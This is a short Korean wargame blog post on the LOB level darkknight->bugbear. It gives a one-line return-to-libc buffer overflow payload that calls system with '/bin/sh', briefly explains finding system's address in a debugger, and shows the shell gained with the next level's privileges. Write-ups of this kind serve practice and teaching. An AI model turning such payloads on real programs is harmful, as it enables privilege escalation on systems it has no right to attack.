Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 |
Tags
- CVE
- Codegate
- 코드게이트 주니어
- NGINX
- pwntools
- blueborne
- lob
- BLUETOOTH
- Branch
- 코드게이트2017
- 도메인 https
- 노드 엑셀
- codegate2017
- Git
- shellcraft
- npm
- CODEGATE2018
- Hacking
- xlsx
- node
- module
- https설정
- pwnable
- doorlock
- https
- openctf
- gogs private git
- 코드게이트
- gogs
- node.js
Archives
- Today
- Total
고졸백수해킹일기
darkknight->bugbear 본문
../bugbear `python -c 'print "\x90"*44+"\xe0\x8a\x05\x40"+"BBBB"+"\x1a\xfc\xff\xbf"+"/bin/sh"'`;
RTL을 이용하여 exploit해주면 된다.
system 주소는 main에 bp를 걸어주고 p system을 쳐주면 구할 수 있다.
/bin/sh의 주소는 esp+8에 넣어주면 된다.
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)
bash$ my-pass
euid = 513
new divide
'Wargame > lob' 카테고리의 다른 글
| giant->assassin (0) | 2018.03.07 |
|---|---|
| bugbear->giant (0) | 2018.03.07 |
| golem->darkknight (0) | 2018.01.30 |
| skeleton->golem (0) | 2018.01.30 |
| vampire->skeleton (0) | 2018.01.28 |